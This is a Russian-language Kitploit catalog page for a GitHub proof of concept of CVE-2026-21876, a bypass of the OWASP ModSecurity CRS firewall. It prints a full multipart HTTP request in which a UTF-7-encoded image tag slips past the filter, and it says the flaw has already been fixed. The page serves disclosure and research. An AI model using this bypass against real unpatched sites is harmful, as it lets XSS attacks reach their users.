Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21876 — Минимальный PoC и Docker-контейнер, демонстрирующие обход WAF в OWASP ModSecurity CRS через обработку charset в multipart, что приводит к доставке XSS-пейлоада. | Kitploit
Инструменты/GitHubGitHub/mefhika120/cve-2026-21876
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на Проникновение
GitHubmefhika120/cve-2026-21876

CVE-2026-21876

Минимальный PoC и Docker-контейнер, демонстрирующие обход WAF в OWASP ModSecurity CRS через обработку charset в multipart, что приводит к доставке XSS-пейлоада.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-21876 (обход WAF OWASP CRS)

Docker-контейнер CVE-2026-21876 + минимальный PoC.

Хочу отдельно поблагодарить @airween и @fzipi за быструю реакцию! Исправление уязвимости было готово в очень короткий срок.

PoC

root@kitploit:~
POST /submit HTTP/1.1
Host: localhost
User-Agent: curl/8.17.0
Accept: */*
Origin: https://example.com
Content-Length: 367
Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz

--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="username"
Content-Type: text/plain; charset=utf-7

+ADw-img+ACA-src+AD0-x+AD4-
--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="dummy"
Content-Type: text/plain; charset=utf-8

dummy
--------------------------cmOi6twNhVJDu76bOwDTVz--

Значение username не проверяется на символы, не входящие в белый список, что приводит к обходу WAF.

Демонстрация обхода

изображение

Тот же payload блокируется здесь

изображение

Ссылки

  • Github security advisory
  • OWASP CRS walkthrough blogpost
  • My medium discovery story
Скачать инструмент